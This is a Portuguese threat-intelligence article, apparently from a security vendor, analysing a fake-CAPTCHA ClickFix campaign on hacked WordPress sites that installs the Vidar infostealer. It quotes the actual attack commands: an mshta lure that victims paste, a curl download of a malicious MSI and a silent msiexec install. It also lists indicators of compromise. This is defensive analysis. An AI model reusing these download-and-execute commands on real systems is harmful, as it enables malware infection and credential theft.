Privacy, Inteligência sobre ameaças

Sites pirateados distribuem o Vidar, um programa de roubo de informações, aos Windows

por Gabriele Orini | 16 de março de 2026
Sites comprometidos

Nos últimos anos, o ClickFix e as técnicas de CAPTCHA falsos tornaram-se uma forma popular utilizada pelos cibercriminosos para distribuir malware. Em vez de explorarem uma vulnerabilidade técnica, estes ataques baseiam-se em convencer as pessoas a executarem elas próprias comandos maliciosos.

Os nossos investigadores detetaram recentemente uma campanha que acaba por instalar o infostealer Vidar, recorrendo a várias cadeias de infeção diferentes.

Um dos métodos utilizados nesta campanha consiste na instalação de um programa de instalação malicioso distribuído através de páginas CAPTCHA falsas alojadas em sites WordPress comprometidos. Detetámos vários sites comprometidos envolvidos na campanha, localizados em países como a Itália, a França, os Estados Unidos, o Reino Unido e o Brasil.

O que é o Vidar?

O Vidar é uma conhecida família de malware de roubo de informações, concebida para recolher dados confidenciais de sistemas infetados. Normalmente, tem como alvo:

  • Nomes de utilizador e palavras-passe guardados no navegador
  • Informações sobre carteiras de criptomoedas
  • Cookies de sessão e tokens de autenticação
  • Dados de preenchimento automático e informações de pagamento guardadas
  • Ficheiros que podem conter dados confidenciais

Como o Vidar é carregado na memória e comunica com servidores de comando remotos, consegue recolher e extrair dados discretamente, sem sinais evidentes de infeção.

CAPTCHA falso: a história sem fim

Quando um utilizador visita um site comprometido, pode ver um ecrã que imita a conhecida página da Cloudflare «A verificar se é humano».

Esta técnica tem sido amplamente utilizada desde 2024 e tem evoluído ao longo do tempo, passando por inúmeras variações, tanto na sua aparência visual como nos comandos maliciosos que desencadeiam a cadeia de infeção.

Confirme que é humano
A mensagem falsa do CAPTCHA apresentada ao utilizador.

A página instrui o visitante a copiar e executar um comando malicioso que dá início à cadeia de infeção, neste caso:

mshta https://{compromised website}/challenge/cf

O Mshta é um Windows legítimo Windows concebido para executar Aplicações HTML da Microsoft (HTA). Por estar integrado no Windows, os atacantes têm-no utilizado indevidamente desde os primórdios das campanhas ClickFix.

Neste caso, o comando executa um script HTA simples e ofuscado, que acaba por descarregar e instalar malware associado ao infostealer Vidar.

Dropper MSI baseado em HTA

O script HTA é a etapa intermédia que descarrega e executa um instalador MSI malicioso. Um MSI é um pacote Windows normalmente utilizado para instalar software, mas os atacantes abusam frequentemente dele para distribuir malware.

O script executa várias operações:

  • A janela é redimensionada para 0x0 e movida para fora do ecrã, tornando a aplicação invisível para o utilizador.
  • O script é encerrado se o document.location.href não começa com http.
  • As cadeias de caracteres são descodificadas utilizando XOR e uma chave aleatória.
  • Através de consultas WMI, o script verifica se existem produtos antivírus instalados.
  • Cria pastas de trabalho ocultas numa pasta aleatória dentro de \AppData\Local para colocar o ficheiro MSI.
  • No final, o script descarrega o ficheiro MSI malicioso de um site comprometido. O ficheiro descarregado tem de ter mais de 100 KB para ser considerado válido. Por fim, remove o :Zone.Identifier fluxo de dados alternativo.
O script HTA malicioso
O script HTA malicioso.

Neste caso, o ficheiro MSI malicioso foi descarregado utilizando o seguinte comando:

C:\Windows\System32\curl.exe" -s -L -oC:\Users\user\AppData\Local\EdgeAgent\WebCore\cleankises.msihttps://{compromised-website}/474a2b77/5ef46f21e2.msi

Posteriormente, o MSI malicioso foi executado com:

"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\EdgeAgent\WebCore\cleankises.msi" /qn

MSI e o carregador GoLang

O MSI define uma ação personalizada (CustomAction) chamada ConfigureNetFx e executa um carregador GoLang.

Os carregadores de malware (também conhecidos como droppers ou downloaders) são ferramentas comuns no ecossistema do cibercrime. A sua principal função consiste em comprometer um sistema de forma furtiva e, em seguida, instalar uma ou mais cargas de malware adicionais.

Nesta campanha, o carregador acaba por descodificar e executar o infostealer Vidar. O executável tem nomes diferentes nas várias amostras MSI analisadas.

A ação personalizada definida no MSI.
A ação personalizada definida no MSI.

O carregador do Golang descodifica um código shell que realiza várias verificações anti-análise, incluindo:

CheckRemoteDebuggerPresent

IsDebuggerPresent

QueryPerformanceCounter

GetTickCount

Após várias etapas intermédias, o carregador descodifica e carrega o infostealer Vidar diretamente na memória.

Análise de sites comprometidos

O iframe malicioso inserido nos sites comprometidos foi gerado pelos domínios cdnwoopress[.]com ou woopresscdn[.]com nos casos analisados.

O iframe malicioso inserido no site comprometido.
O iframe malicioso inserido no site comprometido.

O código injetado tem várias funções, e o comando utilizado no ataque de CAPTCHA falso é obtido a partir do /api/get_payload ponto final.

Código inserido nos sites comprometidos.
Código inserido nos sites comprometidos.

Como o site malicioso estava mal configurado, conseguimos visualizar o código de backend injetado nos sites WordPress comprometidos.

O script inserido executa várias ações:

  • Cria o ficheiro wp-cache-manager.php se ainda não existir, obter o seu conteúdo a partir do ponto de extremidade /api/plugin.
  • Envia uma solicitação de verificação a cada hora, contendo o nome do domínio, o URL do site, a versão do WordPress e o estado.
  • Durante o carregamento das páginas (template_redirect), o script filtra os visitantes com base no User-Agent e direciona-se aos visitantes Windows .
  • Pedidos /api/inject?domain=domain a partir do servidor de comandos remoto. O código HTML da resposta é então apresentado, substituindo a página normal do WordPress.
O código malicioso injetado no site WordPress comprometido.
O código malicioso injetado no site WordPress comprometido.

Como se manter seguro

Ataques como este baseiam-se em induzir as pessoas a executarem comandos por conta própria, pelo que algumas precauções simples podem fazer uma grande diferença.

  • Vá com calma. Se uma página web lhe pedir para executar comandos no seu dispositivo ou para copiar e colar código, pare para pensar antes de seguir as instruções. Os cibercriminosos costumam criar uma sensação de urgência com falsas verificações de segurança, contadores regressivos ou avisos concebidos para o levar a agir sem pensar.
  • Nunca execute comandos provenientes de fontes não confiáveis. Um site legítimo nunca deve exigir que carregue em Win+R, abra o Terminal ou cole comandos no PowerShell apenas para verificar se é humano. Se uma página lhe pedir para fazer isso, considere-a suspeita.
  • Verifique as instruções por conta própria. Se um site lhe pedir para executar um comando ou realizar uma ação técnica, consulte a documentação oficial ou contacte o apoio técnico através de canais de confiança antes de fazer qualquer coisa.
  • Tenha cuidado ao copiar e colar. Alguns ataques ocultam comandos maliciosos no texto copiado. Se alguma vez precisar de executar um comando a partir da documentação, digitá-lo manualmente pode ajudar a reduzir o risco de executar código oculto.
  • Proteja o seu dispositivo. Mantenha o sistema operativo e o navegador atualizados e utilize software de segurança capaz de bloquear sites maliciosos e detetar malware de roubo de dados.
  • Mantenha-se informado. Técnicas como páginas CAPTCHA falsas e ataques ClickFix continuam a evoluir. Saber que os atacantes podem tentar induzi-lo a executar comandos por sua própria iniciativa pode ajudá-lo a identificar estes esquemas fraudulentos antes que tenham sucesso.

Dica profissional: O programa gratuito Malwarebytes Browser Guard pode alertá-lo se um site tentar copiar conteúdo para a sua área de transferência, o que pode ajudar a prevenir este tipo de ataque.

Indicadores de compromisso (IOCs)

Domínios

  • cdnwoopress[.]com: Infraestrutura de CAPTCHA falso
  • woopresscdn[.]com: Infraestrutura de CAPTCHA falso
  • walwood[.]be: Infraestrutura de CAPTCHA falso
  • telegram[.]me/dikkh0k: Vidar C2
  • telegram[.]me/pr55ii: Vidar C2
  • steamcommunity[.]com/profiles/76561198742377525: Vidar C2
  • steamcommunity[.]com/profiles/76561198735736086: Vidar C2

Não nos limitamos a comunicar as ameaças - eliminamo-las

Os riscos de cibersegurança nunca se devem propagar para além de uma manchete. Mantenha as ameaças longe dos seus dispositivos descarregando Malwarebytes hoje mesmo.

Sobre o autor

Gabriele Orini

O Gabriele é um engenheiro de investigação de malware que adora combater o malware. Quando não está a fazer isso, pode encontrá-lo a desfrutar da natureza, da arte e dos animais.

ÚLTIMOS ARTIGOS

Fraudes
Site falso do Pudgy World

O site falso «Pudgy World» rouba as suas palavras-passe de criptomoedas

março 17, 2026

O site de phishing não está associado à Igloo Inc. nem aos Pudgy Penguins, mas foi concebido para atrair fãs e roubar as suas palavras-passe de criptomoedas.

Telemóvel
Um cavalo de Tróia sobre rodas invade o ecrã de um smartphone

O Google toma medidas contra Android que abusam das funcionalidades de acessibilidade

março 17, 2026

Há anos que o malware tem vindo a abusar das funcionalidades de acessibilidade Android. A Google acaba de tornar isso muito mais difícil.

Privacy
Sites comprometidos

Sites pirateados distribuem o Vidar, um programa de roubo de informações, aos Windows

março 16, 2026

Encontrámos páginas falsas do tipo «verifique se é humano» em sites WordPress pirateados que induzem Windows a instalar o programa de roubo de informações Vidar.

Ícone dos contribuidores

Contribuintes

Ícone do Centro de Ameaças

Centro de Ameaças

Ícone de podcasts

Podcast

Ícone do glossário

Glossário

Ícone de burla

Fraudes